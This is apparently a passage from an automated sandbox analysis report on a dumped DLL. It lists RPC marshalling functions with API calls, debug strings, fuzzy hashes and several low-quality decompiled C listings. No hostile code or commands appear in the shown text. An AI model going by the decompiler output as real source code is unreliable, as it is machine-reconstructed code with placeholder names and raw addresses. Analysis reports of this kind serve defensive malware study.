                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer overflow %d bytes$buffer overflow - saved_buffer = %p, BufferEnd = %p$buffer=%d/%d$no marshaller for embedded type %02x
                                                                                                • API String ID: 3997070919-2685964157
                                                                                                • Opcode ID: d52c56668665e0d11587644043e69389bd0c36ed3694fb02c0bfe41df55a6c3a
                                                                                                • Instruction ID: 754b17b0a93d57b78580ee284fb86989b355d0f61fa52c38e9c9e923a210c5ac
                                                                                                • Opcode Fuzzy Hash: d52c56668665e0d11587644043e69389bd0c36ed3694fb02c0bfe41df55a6c3a
                                                                                                • Instruction Fuzzy Hash: 3E813F74A00109EFCB04CF98C490AAEBBB6FF89344F14C558EE599B345D731EA91CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAD120, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 178COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,6EDA139F,?), ref: 6EDAD328
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-3150054447
                                                                                                • Opcode ID: 3c4d76ad0b1f7ce7bfc6904fbd971a36b4a805b8a9a61e3e895872eb1c729a63
                                                                                                • Instruction ID: a2b7341bea8effba8ec4951aeeffbbe840a25aa8a720bdfc235202b750f10607
                                                                                                • Opcode Fuzzy Hash: 3c4d76ad0b1f7ce7bfc6904fbd971a36b4a805b8a9a61e3e895872eb1c729a63
                                                                                                • Instruction Fuzzy Hash: 726130F5900109AFDB04CFA8D851AAF77B9AF49308F048559FE199B341E735EA11CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDACC40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 175COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,00000001), ref: 6EDACE39
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: string=%s$string=%s$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-3150054447
                                                                                                • Opcode ID: 1afb2561f2a85ba689b1a9fdb55df319f62bf13a8c4f90d56501d04edd393767
                                                                                                • Instruction ID: 425df66cd486e174037b06c71a4adde142435ad3961bfbb141af84b94a55e3ce
                                                                                                • Opcode Fuzzy Hash: 1afb2561f2a85ba689b1a9fdb55df319f62bf13a8c4f90d56501d04edd393767
                                                                                                • Instruction Fuzzy Hash: DF6132B5A00149AFDB04DF9CD880AAF77B9AF48218F048559FE199B341E635EB11CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA863F, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 157COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8744
                                                                                                • _NdrClientContextMarshall@12.SOZZ(?,?,00000000), ref: 6EDA8794
                                                                                                Strings
                                                                                                • invalid format type %x, xrefs: 6EDA8732
                                                                                                • flags: 0x%02x, xrefs: 6EDA875A
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8713
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ClientContextExceptionMarshall@12Raise
                                                                                                • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 624206959-1391298755
                                                                                                • Opcode ID: 82e9b46dc980bb03a6cd8959d341a4147774589123fd4262f755a3a126a95897
                                                                                                • Instruction ID: ca07d523569b8da1fc47eaa6072bd87996848c751e04f35380bb1bd2f47cf2b2
                                                                                                • Opcode Fuzzy Hash: 82e9b46dc980bb03a6cd8959d341a4147774589123fd4262f755a3a126a95897
                                                                                                • Instruction Fuzzy Hash: 1B11D6B56041C59BD744CFA9CC61FBA7BA9AF46240F048598FDA48B281D635D610C7B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAA540, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 154COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 21%
                                                                                                			E6EDAA540(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t101;
				void* _t174;

				_t103 = __ecx;
				if(_a8 == 0) {
					L3:
					E6EDA73D0(_t103, _a4 + 4, 4);
					if( &(( *(_a4 + 4))[8]) >  *((intOrPtr*)(_a4 + 0xc))) {
						__imp__RpcRaiseException(0x6f7);
					}
					 *(_a4 + 0x40) = ( *( *(_a4 + 4)) & 0xff | (( *(_a4 + 4))[1] & 0xff) << 0x00000008) & 0xffff | ((( *(_a4 + 4))[2] & 0xff | (( *(_a4 + 4))[3] & 0xff) << 0x00000008) & 0xffff) << 0x00000010;
					 *(_a4 + 4) =  &(( *(_a4 + 4))[4]);
					0x6eda0000("offset is %d\n",  *(_a4 + 0x40));
					 *(_a4 + 0x44) = ( *( *(_a4 + 4)) & 0xff | (( *(_a4 + 4))[1] & 0xff) << 0x00000008) & 0xffff | ((( *(_a4 + 4))[2] & 0xff | (( *(_a4 + 4))[3] & 0xff) << 0x00000008) & 0xffff) << 0x00000010;
					 *(_a4 + 4) =  &(( *(_a4 + 4))[4]);
					0x6eda0000("variance is %d\n",  *(_a4 + 0x44));
					if( *(_a4 + 0x44) > _a12 ||  *(_a4 + 0x44) +  *(_a4 + 0x40) > _a12) {
						0x6eda0000("invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d\n",  *(_a4 + 0x44),  *(_a4 + 0x40), _a12);
						__imp__RpcRaiseException(0x6c6);
						return 0;
					} else {
						L8:
						return E6EDAA440(_a4, _a8);
					}
				}
				_t101 = E6EDAA410(__ecx, _a8);
				_t174 = _t174 + 4;
				if(_t101 != 0) {
					goto L3;
				}
				 *(_a4 + 0x40) = 0;
				 *(_a4 + 0x44) =  *(_a4 + 0x3c);
				goto L8;
			}





                                                                                                0x6edaa540
                                                                                                0x6edaa547
                                                                                                0x6edaa574
                                                                                                0x6edaa57d
                                                                                                0x6edaa594
                                                                                                0x6edaa59b
                                                                                                0x6edaa59b
                                                                                                0x6edaa614
                                                                                                0x6edaa623
                                                                                                0x6edaa632
                                                                                                0x6edaa6ad
                                                                                                0x6edaa6bc
                                                                                                0x6edaa6cb
                                                                                                0x6edaa6dc
                                                                                                0x6edaa706
                                                                                                0x6edaa713
                                                                                                0x00000000
                                                                                                0x6edaa71d
                                                                                                0x6edaa71d
                                                                                                0x00000000
                                                                                                0x6edaa72a
                                                                                                0x6edaa6dc
                                                                                                0x6edaa54d
                                                                                                0x6edaa552
                                                                                                0x6edaa557
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edaa55c
                                                                                                0x6edaa56c
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6EDA3992), ref: 6EDAA59B
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAA713
                                                                                                Strings
                                                                                                • invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d, xrefs: 6EDAA701
                                                                                                • variance is %d, xrefs: 6EDAA6C6
                                                                                                • offset is %d, xrefs: 6EDAA62D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid array bound(s): ActualCount = %d, Offset = %d, MaxValue = %d$offset is %d$variance is %d
                                                                                                • API String ID: 3997070919-604998095
                                                                                                • Opcode ID: eab2292455a35ede9138487c2c5d370ba0d44589cb4567e04a53724f05962aef
                                                                                                • Instruction ID: ab5f5077732cc9dfa7ea1bc1362aa53acf68279111ab9e3209e9e412e08fff1c
                                                                                                • Opcode Fuzzy Hash: eab2292455a35ede9138487c2c5d370ba0d44589cb4567e04a53724f05962aef
                                                                                                • Instruction Fuzzy Hash: 6651AF742041559BD704CF49C490A75BFE3EFC9355F08C2A9F9894F386D239EA51DBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA3D00, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 137COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 44%
                                                                                                			E6EDA3D00(intOrPtr _a4, intOrPtr* _a8, signed char* _a12, signed int _a16) {
				signed char* _v8;
				signed int _v12;
				intOrPtr _v16;
				signed char* _v20;
				intOrPtr _t81;
				void* _t124;
				void* _t125;
				void* _t126;

				_v8 = _a12;
				0x6eda0000("(%p, %p, %p, %d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				_t125 = _t124 + 0x14;
				if(( *_v8 & 0x000000ff) == 0x1d || ( *_v8 & 0x000000ff) == 0x1e) {
					E6EDA73D0(_a4 + 4, _a4 + 4, (_v8[1] & 0x000000ff) + 1);
					_t126 = _t125 + 8;
					if(( *_v8 & 0x000000ff) != 0x1d) {
						_v20 = _a12;
						_v12 =  *((intOrPtr*)(_v20 + 2));
						_a12 = _v20 + 6;
					} else {
						_v12 = _v8[2] & 0x0000ffff;
						_a12 =  &(_v8[4]);
					}
					if((_a16 & 0x000000ff) == 0) {
						if(( *(_a4 + 0x20) & 0x000000ff) == 0 &&  *_a8 == 0) {
							 *_a8 =  *((intOrPtr*)(_a4 + 4));
						}
					} else {
						_t81 = E6EDAA3B0(_a4, _a4, _v12);
						_t126 = _t126 + 8;
						 *_a8 = _t81;
					}
					 *((intOrPtr*)(_a4 + 0x10)) =  *((intOrPtr*)(_a4 + 4));
					_v16 =  *((intOrPtr*)(_a4 + 0x10));
					E6EDAAF00(_a4, _v12);
					_a12 = E6EDAC2B0(_a4, _v16,  *_a8, _a12, _a16 & 0x000000ff);
					0x6eda0000("copying %p to %p\n", _v16,  *_a8);
					if( *_a8 != _v16) {
						E6EDB0120( *_a8, _v16, _v12);
					}
					return 0;
				} else {
					0x6eda0000("invalid format type %x\n",  *_v8 & 0x000000ff);
					__imp__RpcRaiseException(0x6e6);
					return 0;
				}
			}











                                                                                                0x6eda3d09
                                                                                                0x6eda3d22
                                                                                                0x6eda3d27
                                                                                                0x6eda3d33
                                                                                                0x6eda3d78
                                                                                                0x6eda3d7d
                                                                                                0x6eda3d89
                                                                                                0x6eda3da3
                                                                                                0x6eda3dac
                                                                                                0x6eda3db5
                                                                                                0x6eda3d8b
                                                                                                0x6eda3d92
                                                                                                0x6eda3d9b
                                                                                                0x6eda3d9b
                                                                                                0x6eda3dbe
                                                                                                0x6eda3de0
                                                                                                0x6eda3df3
                                                                                                0x6eda3df3
                                                                                                0x6eda3dc0
                                                                                                0x6eda3dc8
                                                                                                0x6eda3dcd
                                                                                                0x6eda3dd3
                                                                                                0x6eda3dd3
                                                                                                0x6eda3dfe
                                                                                                0x6eda3e07
                                                                                                0x6eda3e12
                                                                                                0x6eda3e39
                                                                                                0x6eda3e4b
                                                                                                0x6eda3e5b
                                                                                                0x6eda3e6b
                                                                                                0x6eda3e70
                                                                                                0x00000000
                                                                                                0x6eda3d40
                                                                                                0x6eda3d4c
                                                                                                0x6eda3d59
                                                                                                0x00000000
                                                                                                0x6eda3d5f

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: (%p, %p, %p, %d)$copying %p to %p$invalid format type %x
                                                                                                • API String ID: 4056999889-4001265739
                                                                                                • Opcode ID: 91a79de413fc3eb8095d54703ce57511440e9cb1779499d2b9f9c8537a9ddd99
                                                                                                • Instruction ID: 78b2e277ae1306cd01a1fb775808e5572d3517a2b1dc4c0a7b5c1970b6805546
                                                                                                • Opcode Fuzzy Hash: 91a79de413fc3eb8095d54703ce57511440e9cb1779499d2b9f9c8537a9ddd99
                                                                                                • Instruction Fuzzy Hash: 9A5153B5A04149EFCB44CF98C8909AEBBB6AF49304F10C599F9599B345E730EB50CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1CC0, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 121COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1DE3
                                                                                                Strings
                                                                                                • string=%s, xrefs: 6EDA1D39
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA1CD2
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA1DD1
                                                                                                • string=%s, xrefs: 6EDA1DA8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x$string=%s$string=%s
                                                                                                • API String ID: 3997070919-3787768504
                                                                                                • Opcode ID: f93a8c38a6bf33348470d04dec32b58834743f4f6005a941194b6555f8f59a96
                                                                                                • Instruction ID: 057f481ce277bbec3bcbbb4bcedf1c922b039f1e11b6426339cab451c32f5d7a
                                                                                                • Opcode Fuzzy Hash: f93a8c38a6bf33348470d04dec32b58834743f4f6005a941194b6555f8f59a96
                                                                                                • Instruction Fuzzy Hash: 1E4162B5E00109EFCB04CFD8D881AAEBBB6BF85305F148448EA559B341E731DB55CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5890, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 114COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 6EDAA9B0: RpcRaiseException.RPCRT4(000006F7,6EDACF82,00000000), ref: 6EDAA9DA
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA59BF
                                                                                                Strings
                                                                                                • (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p), xrefs: 6EDA58A2
                                                                                                • string=%s, xrefs: 6EDA5915
                                                                                                • Unhandled string type: %#x, xrefs: 6EDA59AD
                                                                                                • string=%s, xrefs: 6EDA5984
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (pStubMsg == ^%p, pMemory == ^%p, pFormat == ^%p)$Unhandled string type: %#x$string=%s$string=%s
                                                                                                • API String ID: 3997070919-3787768504
                                                                                                • Opcode ID: 254244805384c8716a7e408d8d5df78a83957e7c13cad2e9879590bbdd5d1149
                                                                                                • Instruction ID: f36af447eae9745a415f223902d05b3afa64e2dd38ee8f287d21a0ddf490e6d2
                                                                                                • Opcode Fuzzy Hash: 254244805384c8716a7e408d8d5df78a83957e7c13cad2e9879590bbdd5d1149
                                                                                                • Instruction Fuzzy Hash: 84416EB5E00109EFCB04CFD8D890AAEBBB9BF85305F108548EA559B341E731EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA7E81, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7EF6
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7F65
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$value: 0x%08lx
                                                                                                • API String ID: 3846748424-1131284453
                                                                                                • Opcode ID: b696f77a738ad791a7024d0e991b4e846dd80cfc6f6ab7f1f3bc6e3a48e5007e
                                                                                                • Instruction ID: 511c85775525265586a38d3089649c7da39d66b4a37b530038666dae2315f22f
                                                                                                • Opcode Fuzzy Hash: b696f77a738ad791a7024d0e991b4e846dd80cfc6f6ab7f1f3bc6e3a48e5007e
                                                                                                • Instruction Fuzzy Hash: E94171B4604205EFDB00CFA8D840BA93765AF85719F10C558FE199F388E731EB50CB61
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA7D5C, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106memoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7DD1
                                                                                                  • Part of subcall function 6EDAAF00: RpcRaiseException.RPCRT4(000006F7,?,6EDA108D,?,00000004), ref: 6EDAAF34
                                                                                                • NdrAllocate.RPCRT4(?,00000004), ref: 6EDA7E40
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Allocate$ExceptionRaise
                                                                                                • String ID: *ppMemory: %p$*ppMemory: %p$value: 0x%08lx
                                                                                                • API String ID: 3846748424-1131284453
                                                                                                • Opcode ID: c9984271f20bcaadfc6a9c12a69530ebefa05e4554e57eb67a0d5dfa2efe4f83
                                                                                                • Instruction ID: 57107f4c461a964d05b55780cf5996513fefc4572efd6dac7d38edf471f3ec2c
                                                                                                • Opcode Fuzzy Hash: c9984271f20bcaadfc6a9c12a69530ebefa05e4554e57eb67a0d5dfa2efe4f83
                                                                                                • Instruction Fuzzy Hash: 454162B4A04205EFDB04CFA8D850BAA776AAF45319F04C558FE598F389E731DB40CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA41B0, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 28%
                                                                                                			E6EDA41B0(intOrPtr _a4, intOrPtr _a8, signed char* _a12, signed int _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _t70;
				void* _t98;
				void* _t99;

				_v12 = 0;
				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
				if(( *_a12 & 0x000000ff) == 0x21) {
					_v16 =  *((intOrPtr*)(_a4 + 0x30));
					_v8 =  *((intOrPtr*)(_a4 + 4));
					 *((intOrPtr*)(_a4 + 0x30)) = 1;
					 *((intOrPtr*)(_a4 + 0x18)) = 0;
					E6EDA6490(_a4, _a12);
					 *((intOrPtr*)(_a4 + 0x30)) = _v16;
					0x6eda0000("difference = 0x%x\n",  *((intOrPtr*)(_a4 + 4)) - _v8);
					if( *((intOrPtr*)(_a4 + 0x34)) == 0) {
						 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
						_v12 = 1;
					}
					 *((intOrPtr*)(_a4 + 4)) = _v8;
					E6EDAD650(0x21, _a4, _a12);
					E6EDAD830(_t70, _t98, _t99, 0x21, _a4, _a8, _a12, _a16 & 0x000000ff, 1, 1);
					if(_v12 != 0) {
						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
						 *((intOrPtr*)(_a4 + 0x34)) = 0;
					}
					return 0;
				}
				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}









                                                                                                0x6eda41b6
                                                                                                0x6eda41d3
                                                                                                0x6eda41ed
                                                                                                0x6eda4224
                                                                                                0x6eda422d
                                                                                                0x6eda4233
                                                                                                0x6eda423d
                                                                                                0x6eda424c
                                                                                                0x6eda4257
                                                                                                0x6eda4269
                                                                                                0x6eda4278
                                                                                                0x6eda4283
                                                                                                0x6eda4286
                                                                                                0x6eda4286
                                                                                                0x6eda4293
                                                                                                0x6eda42a0
                                                                                                0x6eda42bf
                                                                                                0x6eda42cb
                                                                                                0x6eda42d6
                                                                                                0x6eda42dc
                                                                                                0x6eda42dc
                                                                                                0x00000000
                                                                                                0x6eda42e3
                                                                                                0x6eda4204
                                                                                                0x6eda4211
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4211
                                                                                                • _NdrComplexArrayMemorySize@8.SOZZ(?,?), ref: 6EDA424C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ArrayComplexExceptionMemoryRaiseSize@8
                                                                                                • String ID: (%p,%p,%p,%d)$difference = 0x%x$invalid format type %x
                                                                                                • API String ID: 3734139831-2050479018
                                                                                                • Opcode ID: 1b3b93d76e6053dda3499361e3d9cc45d77ab00d8b20b20ad022f93ff931c25d
                                                                                                • Instruction ID: 6868bf690cab6fdc996e4288eef1d744fb4efec9fb6c2605e54cbcd62c2285d7
                                                                                                • Opcode Fuzzy Hash: 1b3b93d76e6053dda3499361e3d9cc45d77ab00d8b20b20ad022f93ff931c25d
                                                                                                • Instruction Fuzzy Hash: 41410EB5600208AFDB44CF98C990B9A7BB6AF88344F14C158FD498B385D771EA91CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6F70, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6FC5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
